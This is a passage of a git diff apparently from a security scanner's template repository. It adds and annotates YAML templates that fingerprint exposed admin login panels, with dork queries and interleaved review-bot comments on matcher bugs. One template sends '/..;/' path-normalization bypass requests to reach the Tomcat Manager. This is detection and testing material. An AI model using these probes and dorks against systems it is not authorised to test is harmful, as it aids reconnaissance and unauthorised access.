@@ -1,11 +1,16 @@ id: adobe-experience-manager-login info: - name: Adobe-Experience-Manager + name: Adobe Experience Manager Login Panel author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - tags: panel,aem + description: An Adobe Experience Manager login panel was detected. + reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + classification: + cwe-id: CWE-200 + tags: panel,aem,adobe requests: - method: GET @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adobe/adobe-media-server.yaml b/exposed-panels/adobe/adobe-media-server.yaml index deaf55913a..2ee6efc2c8 100644 --- a/exposed-panels/adobe/adobe-media-server.yaml +++ b/exposed-panels/adobe/adobe-media-server.yaml @@ -1,10 +1,15 @@ id: adobe-media-server info: - name: Adobe Media Server + name: Adobe Media Server Login Panel author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + description: An Adobe Media Server login panel was detected. + reference: + - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + - https://helpx.adobe.com/support/adobe-media-server.html + classification: + cwe-id: CWE-200 tags: panel,adobe requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/advance-setup.yaml b/exposed-panels/advance-setup.yaml index 957677ccf9..bbee2bbcf7 100644 --- a/exposed-panels/advance-setup.yaml +++ b/exposed-panels/advance-setup.yaml 
@@ -1,11 +1,16 @@ -id: advance-setup-login +id: advanced-setup-login info: - name: Advance Setup Login + name: ActionTec Modem Advanced Setup Login Panel author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6819 - tags: panel + description: An ActionTec Modem Advanced Setup login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6819 + - https://www.actiontec.com/dsl/ + classification: + cwe-id: CWE-200 + tags: panel,setup requests: - method: GET @@ -20,3 +25,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/aerohive-netconfig-ui.yaml b/exposed-panels/aerohive-netconfig-ui.yaml new file mode 100644 index 0000000000..b80bf49e52 --- /dev/null +++ b/exposed-panels/aerohive-netconfig-ui.yaml @@ -0,0 +1,39 @@ +id: aerohive-netconfig-ui + +info: + name: Aerohive NetConfig UI + author: pussycat0x + severity: info + description: An Aerohive NetConfig user interface was detected. The NetConfig UI provides a fundamental set of configurations for configuring basic network and HiveManager connectivity settings, and uploading new IQ Engine images to Extreme Networks APs. + reference: + - https://docs.aerohive.com/330000/docs/help/english/ng/Content/reference/docs/online-help-systems.htm + classification: + cwe-id: CWE-200 + metadata: + shodan-dork: http.title:"Aerohive NetConfig UI" + tags: panel,tech,hiveos,aerohive + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php5" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Aerohive NetConfig UI' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>' + +# Enhanced by mp on 2022/03/21 diff --git a/exposed-panels/aims-password-mgmt-client.yaml b/exposed-panels/aims-password-mgmt-client.yaml deleted file mode 100644 index 76998f88a1..0000000000 
--- a/exposed-panels/aims-password-mgmt-client.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: aims-password-mgmt-client - -info: - name: Aims Password Management Client Detect - author: iamthefrogy - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/aims/ps/" - - matchers: - - type: word - words: - - "Avatier Corporation" diff --git a/exposed-panels/aims-password-portal.yaml b/exposed-panels/aims-password-portal.yaml deleted file mode 100644 index eb21d8e0eb..0000000000 --- a/exposed-panels/aims-password-portal.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aims-password-portal - -info: - name: AIMS Password Management Portal - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6576 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/default.aspx' - - matchers-condition: and - matchers: - - type: word - words: - - 'Password Management Client' - - type: status - status: - - 200 diff --git a/exposed-panels/airflow-panel.yaml b/exposed-panels/airflow-panel.yaml index 47a13475f4..1df0b6c38b 100644 --- a/exposed-panels/airflow-panel.yaml +++ b/exposed-panels/airflow-panel.yaml @@ -1,12 +1,19 @@ -id: airflow-panel +id: airflow-admin-login-panel info: - name: Airflow Admin login + name: Apache Airflow Admin Login Panel author: pdteam severity: info - tags: panel,apache,airflow + description: An Apache Airflow admin login panel was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Sign In - Airflow" + tags: panel,apache,airflow,admin requests: - method: GET @@ -25,4 +32,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/21 
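Review bot: The classification added to `airflow-panel.yaml` sets `cvss-score: 8.3` and `cwe-id: CWE-522` for a template whose matcher only confirms that a login page is reachable, while `severity: info` is kept a few lines above; the two signals contradict each other and any tooling keyed on either will disagree. The sibling panel templates in this commit use `cwe-id: CWE-200` with no cvss block, so either drop the two cvss lines and use `cwe-id: CWE-200`, or raise the severity if the 8.3 score is deliberate. The same score/severity mismatch (`cvss-score: 5.3` next to `severity: info`) appears in the new `avantfax-panel.yaml` later in this diff.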
diff --git a/exposed-panels/akamai-cloudtest.yaml b/exposed-panels/akamai-cloudtest.yaml index 190c8a3050..5464d9d5b2 100644 --- a/exposed-panels/akamai-cloudtest.yaml +++ b/exposed-panels/akamai-cloudtest.yaml @@ -4,6 +4,11 @@ info: name: Akamai CloudTest Panel author: emadshanab severity: info + description: An Akamai CloudTest panel was discovered. + reference: + - https://techdocs.akamai.com/cloudtest/docs + classification: + cwe-id: CWE-200 tags: panel,akamai requests: @@ -21,4 +26,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/alfresco-detect.yaml b/exposed-panels/alfresco-detect.yaml new file mode 100644 index 0000000000..563dd840e7 --- /dev/null +++ b/exposed-panels/alfresco-detect.yaml @@ -0,0 +1,40 @@ +id: alfresco-detect + +info: + name: Alfresco CMS Detection + author: pathtaga + severity: info + description: Alfresco CMS was discovered. + reference: + - https://www.alfresco.com/ + classification: + cwe-id: CWE-200 + tags: alfresco,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' + + - type: word + part: header + words: + - "application/json" + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/alienvault-usm.yaml b/exposed-panels/alienvault-usm.yaml index 5934bf4ae0..0214e622c8 100644 --- a/exposed-panels/alienvault-usm.yaml +++ b/exposed-panels/alienvault-usm.yaml 
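Review bot: The word matcher in the new `alfresco-detect.yaml` compares the literal string `org\/alfresco\/api\/opencmis\/OpenCMIS.get`, backslashes included, because `type: word` is a substring match rather than a regex; it only succeeds if the response body carries JSON-escaped slashes. The second matcher requires an `application/json` header, so that may be the intent, but the requested path ends in `/atom`, which suggests an Atom XML body where the slashes would be unescaped and the matcher would never fire. Confirm against a live response, or switch the matcher to `type: regex`, where `\/` is a valid escape for `/`.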
@@ -1,12 +1,15 @@ id: alienVault-usm info: - name: AlienVault USM + name: AlienVault USM Login Panel author: dhiyaneshDK severity: info - tags: panel + description: An AlienVault USM login panel was detected. + classification: + cwe-id: CWE-200 metadata: - shodan-query: 'http.title:"AlienVault USM"' + shodan-query: http.title:"AlienVault USM" + tags: panel,alienvault requests: - method: GET @@ -21,3 +24,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml index 6dbaa22d28..a420d84dba 100644 --- a/exposed-panels/ambari-exposure.yaml +++ b/exposed-panels/ambari-exposure.yaml @@ -1,10 +1,15 @@ id: ambari-exposure info: - name: Apache Ambari Exposure / Unauthenticated Access + name: Apache Ambari Exposure Admin Login Panel author: pdteam severity: medium - tags: panel + description: An Apache Ambari panel was discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + tags: panel,apache,ambari,exposure requests: - method: GET @@ -16,4 +21,6 @@ requests: words: - 'Ambari' - 'href="http://www.apache.org/licenses/LICENSE-2.0"' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml index f5c1e9646e..1c2714211b 100644 --- a/exposed-panels/amcrest-login.yaml +++ b/exposed-panels/amcrest-login.yaml @@ -4,11 +4,15 @@ info: name: Amcrest Login author: DhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/7273 + description: An Amcrest LDAP user login was discovered. + reference: + - https://www.exploit-db.com/ghdb/7273 + classification: + cwe-id: CWE-200 metadata: shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" - tags: panel,camera + tags: panel,camera,amcrest requests: - method: GET 
@@ -26,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ametys-admin-login.yaml b/exposed-panels/ametys-admin-login.yaml new file mode 100644 index 0000000000..7f33273288 --- /dev/null +++ b/exposed-panels/ametys-admin-login.yaml @@ -0,0 +1,36 @@ +id: ametys-admin-login + +info: + name: Ametys Admin Login Panel + author: pathtaga + severity: info + description: An Ametys admin login panel was discovered. + classification: + cwe-id: CWE-200 + tags: panel,ametys,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/_admin/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ametys - Log in' + - '' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ampps-admin-panel.yaml b/exposed-panels/ampps-admin-panel.yaml index c297a5060f..1ced15ef7b 100644 --- a/exposed-panels/ampps-admin-panel.yaml +++ b/exposed-panels/ampps-admin-panel.yaml @@ -4,7 +4,10 @@ info: name: AMPPS Admin Login Panel author: deFr0ggy severity: info - tags: panel,ampps + description: An AMPPS Admin login panel was detected. + classification: + cwe-id: CWE-200 + tags: panel,ampps,login requests: - method: GET @@ -33,3 +36,5 @@ requests: group: 1 regex: - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ampps-panel.yaml b/exposed-panels/ampps-panel.yaml index 2b77a49db3..4a44ba9360 100644 --- a/exposed-panels/ampps-panel.yaml +++ b/exposed-panels/ampps-panel.yaml @@ -4,7 +4,10 @@ info: name: AMPPS Login Panel author: deFr0ggy severity: info - tags: panel,ampps + description: An AMPPS login panel was detected. + classification: + cwe-id: CWE-200 + tags: panel,ampps,login requests: - method: GET 
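Review bot: The second entry in the word matcher of the new `ametys-admin-login.yaml`, `- ''`, is an empty string; with `condition: or` the matcher is satisfied by any body, so together with the `200` status check the template would report every host that serves anything at `/_admin/index.html`. If this is a rendering artifact from a stripped tag, restore the intended marker; otherwise delete the empty entry so only `'Ametys - Log in'` decides. The extractor regex `' ([0-9.]+)'` in the same file has the same stripped-prefix look and should be checked against the raw file.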
@@ -33,3 +36,5 @@ requests: group: 1 regex: - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ansible-semaphore-panel.yaml b/exposed-panels/ansible-semaphore-panel.yaml new file mode 100644 index 0000000000..9c7790ff1d --- /dev/null +++ b/exposed-panels/ansible-semaphore-panel.yaml @@ -0,0 +1,32 @@ +id: ansible-semaphore-panel + +info: + name: Ansible Semaphore Panel Detect + author: Yuzhe-zhang-0 + severity: info + description: An Ansible Semaphore login panel was detected. + reference: + - https://ansible-semaphore.com/ + - https://github.com/ansible-semaphore/semaphore + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.html:"Semaphore" + tags: panel,ansible,semaphore,cicd,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/auth/login' + + matchers-condition: or + matchers: + - type: word + words: + - 'Ansible Semaphore' + + - type: regex + regex: + - 'Semaphore' + +# Enhanced by mp on 2022/03/23 diff --git a/exposed-panels/ansible-tower-exposure.yaml b/exposed-panels/ansible-tower-exposure.yaml index 72789c4755..66766fc246 100644 --- a/exposed-panels/ansible-tower-exposure.yaml +++ b/exposed-panels/ansible-tower-exposure.yaml @@ -2,9 +2,18 @@ id: ansible-tower-exposure info: name: Ansible Tower Exposure - author: pdteam + author: pdteam,idealphase severity: low - tags: panel + description: Ansible Tower was detected. Ansible Tower is a commercial offering that helps teams manage complex multi-tier deployments by adding control, knowledge, and delegation to Ansible-powered environments. + reference: + - https://docs.ansible.com/ansible-tower/3.8.4/html/administration/ + - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html + classification: + cwe-id: CWE-200 + metadata: + google-query: intitle:"Ansible Tower" + shodan-query: title:"Ansible Tower" + tags: panel,ansible requests: - method: GET 
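Review bot: The new `ansible-semaphore-panel.yaml` uses `matchers-condition: or` with a regex matcher of just `'Semaphore'`, a plain substring that already subsumes the word matcher `'Ansible Semaphore'` and will also fire on unrelated pages that merely mention the word; there is no status matcher either, so error pages count as hits. Consider dropping the bare regex, keeping the word matcher, and adding `matchers-condition: and` with a `- type: status` block containing `- 200`. If the regex was meant to catch a more specific marker of the login page, tighten it to that marker.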
@@ -15,5 +24,14 @@ requests: - type: word words: - "Ansible Tower" - - "ansible-main-menu" - condition: and \ No newline at end of file + - "ansible-bootstrap" + condition: or + + extractors: + - type: regex + group: 1 + part: body + regex: + - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/apache/apache-apisix-panel.yaml b/exposed-panels/apache/apache-apisix-panel.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/exposed-panels/apache/apache-apisix-panel.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml similarity index 61% rename from exposed-panels/public-tomcat-manager.yaml rename to exposed-panels/apache/public-tomcat-manager.yaml index 67f8d2ab1b..fea6aabea5 100644 --- a/exposed-panels/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -1,10 +1,13 @@ id: public-tomcat-manager info: - name: tomcat manager disclosure + name: Apache Tomcat Manager Disclosure author: Ahmed Sherif,geeknik severity: info - tags: panel + description: An Apache Tomcat Manager panel was discovered. + classification: + cwe-id: CWE-200 + tags: panel,tomcat,apache requests: - method: GET 
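Review bot: The extractor regex `'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>'` added to `ansible-tower-exposure.yaml` captures greedily, so `(.+)` runs to the last `" />` on the same line and can swallow neighbouring attributes or tags instead of only the version token. A negated class is the usual fix: `- 'href="\/static\/assets\/favicon\.ico\?v=([^"]+)"'`.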
@@ -16,9 +19,12 @@ requests: matchers: - type: word words: - - Apache Tomcat + - "Apache Tomcat" + - type: status status: - 401 - 200 condition: or + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/apache/tomcat-pathnormalization.yaml b/exposed-panels/apache/tomcat-pathnormalization.yaml new file mode 100644 index 0000000000..649547cfeb --- /dev/null +++ b/exposed-panels/apache/tomcat-pathnormalization.yaml @@ -0,0 +1,36 @@ +id: tomcat-manager-pathnormalization + +info: + name: Tomcat Manager Path Normalization + author: organiccrap + severity: info + description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target + operating system. + reference: + - https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/mitigation-path-normalization + - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf + classification: + cwe-id: CWE-200 + tags: panel,tomcat,apache + +requests: + - method: GET + path: + - '{{BaseURL}}/..;/manager/html' + - '{{BaseURL}}/..;/host-manager/html' + + matchers-condition: and + matchers: + - type: word + words: + - 'username="tomcat" password="s3cret"' + - 'manager-gui' + condition: and + + - type: status + negative: true + status: + - 403 + - 401 + +# Enhanced by mp on 2022/03/17 diff --git a/exposed-panels/apiman-panel.yaml b/exposed-panels/apiman-panel.yaml index eb3fa9f385..24bbf1f89b 100644 --- a/exposed-panels/apiman-panel.yaml +++ b/exposed-panels/apiman-panel.yaml 
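Review bot: In the new `tomcat-pathnormalization.yaml` the description says a "login panel was discovered", but the matchers require `username="tomcat" password="s3cret"` and `manager-gui` in the body while explicitly rejecting 401 and 403 responses, so a positive result presumably means Tomcat's manager help text was served outside an authentication challenge via the `/..;/` path — a different and likely more serious condition than a visible login panel. Reword the description to state what a match actually indicates, e.g. `description: The Tomcat Manager page was reachable without an authentication challenge via path normalization.`, and reconsider whether `severity: info` with `cwe-id: CWE-200` fits that outcome. The negated status matcher also accepts 404 and 5xx responses, so the word matcher alone carries the decision; a positive `200` check would make the intent explicit.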
@@ -1,10 +1,14 @@ id: apiman-panel info: - name: Apiman Instance Detection Template + name: Apiman Login Panel author: righettod severity: info - description: Try to detect the presence of a Apiman instance via the login redirection + description: An Apiman instance was detected via the login redirection. + reference: + - https://www.apiman.io/latest/ + classification: + cwe-id: CWE-200 tags: panel,apiman requests: @@ -21,4 +25,6 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/03/18 diff --git a/exposed-panels/aptus-detect.yaml b/exposed-panels/aptus-detect.yaml new file mode 100644 index 0000000000..2b2f0ef0c3 --- /dev/null +++ b/exposed-panels/aptus-detect.yaml @@ -0,0 +1,25 @@ +id: aptus-detect + +info: + name: Aptus Login Panel + author: princechaddha + severity: info + metadata: + shodan-query: http.title:"Aptus Login" + tags: panel,aptus + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Aptus Login" + + - type: status + status: + - 200 diff --git a/exposed-panels/arcgis/arcgis-panel.yaml b/exposed-panels/arcgis/arcgis-panel.yaml new file mode 100644 index 0000000000..b6b6fb7696 --- /dev/null +++ b/exposed-panels/arcgis/arcgis-panel.yaml 
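Review bot: The new `aptus-detect.yaml` ships without the `description`, `reference` and `classification` fields that every other template touched in this commit carries, so its info block stops at `severity: info` and metadata. Add at least `description: An Aptus login panel was detected.` and a `classification:` block with `cwe-id: CWE-200` to keep it consistent with the sibling panels. The same omission applies to the new `avayaaura-cm-panel.yaml`, `avayaaura-system-manager-panel.yaml` and `bomgar-login-panel.yaml` later in this diff.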
@@ -0,0 +1,44 @@ +id: arcgis-panel + +info: + name: ArcGIS Enterprise Panel + author: Podalirius + severity: info + description: An ArcGIS instance was discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cwe-id: CWE-200 + tags: docs,arcgis,cms,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/portal/portalhelp/en/' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS Enterprise' + - 'Installation and Deployment' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + + - type: regex + part: body + group: 2 + regex: + - '(Released Version:[\n\t ]+(([0-9]+(.[0-9]+)?(.[0-9]+)?)([\n\t ]+\([A-Za-z]+[\t ]+20[0-9][0-9]\))?))' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/arcgis/arcgis-rest-api.yaml b/exposed-panels/arcgis/arcgis-rest-api.yaml new file mode 100644 index 0000000000..897c70d812 --- /dev/null +++ b/exposed-panels/arcgis/arcgis-rest-api.yaml @@ -0,0 +1,29 @@ +id: arcgis-rest-api + +info: + name: ArcGIS Exposed Docs + author: Podalirius + severity: info + description: ArcGIS documents were discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cwe-id: CWE-200 + tags: api,arcgis,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/server/sdk/rest/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS REST API' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/argocd-login.yaml b/exposed-panels/argocd-login.yaml new file mode 100644 index 0000000000..546bbfd8cc --- /dev/null +++ b/exposed-panels/argocd-login.yaml 
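Review bot: In the second extractor of the new `arcgis-panel.yaml`, the sub-groups `(.[0-9]+)?` use an unescaped `.`, which matches any character rather than a literal dot, so `group: 2` can capture strings such as `10x5` or a version fused with an adjacent digit. Escape the dots: `(([0-9]+(\.[0-9]+)?(\.[0-9]+)?)`. The first extractor's regex `' ([0-9.]+)'` looks like it lost a leading marker in rendering and should be checked against the raw file.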
@@ -0,0 +1,32 @@ +id: argocd-detect + +info: + name: Argo CD Login Panel + author: Adam Crosser,daffainfo + severity: info + description: An Argo CD login panel was discovered. + reference: + - https://argoproj.github.io/cd/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Argo CD" + tags: panel,argocd,login,kubernetes + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Argo CD' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml index b0a82d7536..3532e9a84c 100644 --- a/exposed-panels/atlassian-crowd-panel.yaml +++ b/exposed-panels/atlassian-crowd-panel.yaml @@ -1,10 +1,15 @@ id: atlassian-crowd-panel info: - name: Atlassian Crowd panel detect + name: Atlassian Crowd Login Panel author: organiccrap severity: info - tags: panel + description: An Atlassian Crowd login panel was discovered. + reference: + - https://www.atlassian.com/ + classification: + cwe-id: CWE-200 + tags: panel,atlassian requests: - method: GET @@ -16,3 +21,5 @@ requests: words: - Atlassian Crowd - Login part: body + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/atvise-login.yaml b/exposed-panels/atvise-login.yaml new file mode 100644 index 0000000000..bc58bf1715 --- /dev/null +++ b/exposed-panels/atvise-login.yaml 
@@ -0,0 +1,33 @@ +id: atvise-login + +info: + name: Atvise Login Panel + author: idealphase + severity: info + description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. + reference: + - https://www.exploit-db.com/ghdb/7837 + - https://www.atvise.com/en + classification: + cwe-id: CWE-200 + metadata: + google-dork: intitle:"atvise - next generation" + tags: panel,atvise + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'atvise - next generation' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/avantfax-panel.yaml b/exposed-panels/avantfax-panel.yaml new file mode 100644 index 0000000000..7694287813 --- /dev/null +++ b/exposed-panels/avantfax-panel.yaml @@ -0,0 +1,41 @@ +id: avantfax-panel + +info: + name: AvantFAX Login Panel + author: pikpikcu,daffainfo + severity: info + description: An AvantFAX login panel was discovered. + reference: + - http://www.avantfax.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"AvantFAX - Login" + tags: panel,avantfax,login + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "- AvantFAX - Login" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '

([0-9.]+)<\/p>' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/avatier-password-management.yaml b/exposed-panels/avatier-password-management.yaml new file mode 100644 index 0000000000..49cd4c37ae --- /dev/null +++ b/exposed-panels/avatier-password-management.yaml @@ -0,0 +1,37 @@ +id: avatier-password-management + +info: + name: Avatier Password Management Panel + author: praetorian-thendrickson,iamthefrogy,dhiyaneshDK + severity: info + description: An Avatier password management panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6576 + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.favicon.hash:983734701 + tags: panel,avatier,aims + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/' + + redirects: true + max-redirects: 2 + matchers-condition: or + matchers: + - type: word + words: + - 'LabelWelcomeToPS' + - 'Avatier Corporation' + - 'Welcome to Password Management' + condition: or + + - type: word + words: + - 'Password Management Client' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/avaya/avayaaura-cm-panel.yaml b/exposed-panels/avaya/avayaaura-cm-panel.yaml new file mode 100644 index 0000000000..17b93b7838 --- /dev/null +++ b/exposed-panels/avaya/avayaaura-cm-panel.yaml @@ -0,0 +1,25 @@ +id: avayaaura-cm-panel + +info: + name: Avaya Aura Communication Manager (CM) Panel + author: princechaddha + severity: info + tags: panel,avaya + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/common/login/webLogin" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Avaya Aura" + - "Communication Manager (CM)" + condition: and + + - type: status + status: + - 200 diff --git a/exposed-panels/avaya/avayaaura-system-manager-panel.yaml b/exposed-panels/avaya/avayaaura-system-manager-panel.yaml new file mode 100644 index 0000000000..928b51eb3b --- /dev/null 
+++ b/exposed-panels/avaya/avayaaura-system-manager-panel.yaml @@ -0,0 +1,32 @@ +id: avayaaura-system-manager-panel + +info: + name: Avaya Aura System Manager Panel + author: princechaddha + severity: info + tags: panel,avaya + +requests: + - method: GET + path: + - "{{BaseURL}}/network-login/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Avaya Aura" + - "System Manager" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - " System Manager ([a-z0-9.]+)" diff --git a/technologies/aviatrix-detect.yaml b/exposed-panels/aviatrix-panel.yaml similarity index 58% rename from technologies/aviatrix-detect.yaml rename to exposed-panels/aviatrix-panel.yaml index 64be83fd08..9107535ba9 100644 --- a/technologies/aviatrix-detect.yaml +++ b/exposed-panels/aviatrix-panel.yaml @@ -1,12 +1,17 @@ -id: aviatrix-detect +id: aviatrix-panel info: - name: Aviatrix Detect - author: pikpikcu,philippedelteil + name: Aviatrix Cloud Controller Panel Login + author: pikpikcu,philippedelteil,daffainfo severity: info - tags: tech,aviatrix + description: An Aviatrix Cloud Controller login panel was detected. + reference: + - https://docs.aviatrix.com/HowTos/controller_config.html + classification: + cwe-id: CWE-200 metadata: - shodan-query: http.title:"AviatrixController", http.title:"Aviatrix Cloud Controller" + shodan-query: http.title:"Aviatrix Cloud Controller" + tags: panel,aviatrix requests: - method: GET @@ -29,3 +34,5 @@ requests: name: "favicon" dsl: - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" + +# Enhanced by mp on 2022/03/23 diff --git a/exposed-panels/avtech-avn801-camera-panel.yaml b/exposed-panels/avtech-avn801-camera-panel.yaml new file mode 100644 index 0000000000..6c233d50a7 --- /dev/null +++ b/exposed-panels/avtech-avn801-camera-panel.yaml 
@@ -0,0 +1,30 @@ +id: avtech-avn801-camera-panel + +info: + name: Avtech AVN801 Network Camera Panel Detect + author: idealphase + severity: info + description: AVTECH offers a range of IP camera series with different shapes, resolutions and lens to fulfill different demands. Select the items needed to narrow down product search. + reference: + - http://www.avtech.com.tw + metadata: + shodan-query: title:"login" product:"Avtech AVN801 network camera" + tags: panel,avtech,iot,camera + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "IP Surveillance for Your Life" + - "avtech" + - "/cgi-bin/guest/Login.cgi?rnd=" + condition: and + + - type: status + status: + - 200 diff --git a/exposed-panels/avtech-dvr-exposure.yaml b/exposed-panels/avtech-dvr-exposure.yaml index f3f362bcc8..5b27adcab8 100644 --- a/exposed-panels/avtech-dvr-exposure.yaml +++ b/exposed-panels/avtech-dvr-exposure.yaml @@ -2,10 +2,11 @@ id: avtech-dvr-exposure info: name: Avtech AVC798HA DVR Information Exposure - description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication. - reference: http://www.avtech.com.tw/ author: geeknik severity: low + description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication. + reference: + - http://www.avtech.com.tw/ tags: dvr,exposure,avtech requests: diff --git a/exposed-panels/aws-opensearch-login.yaml b/exposed-panels/aws-opensearch-login.yaml new file mode 100644 index 0000000000..14f111d73a --- /dev/null +++ 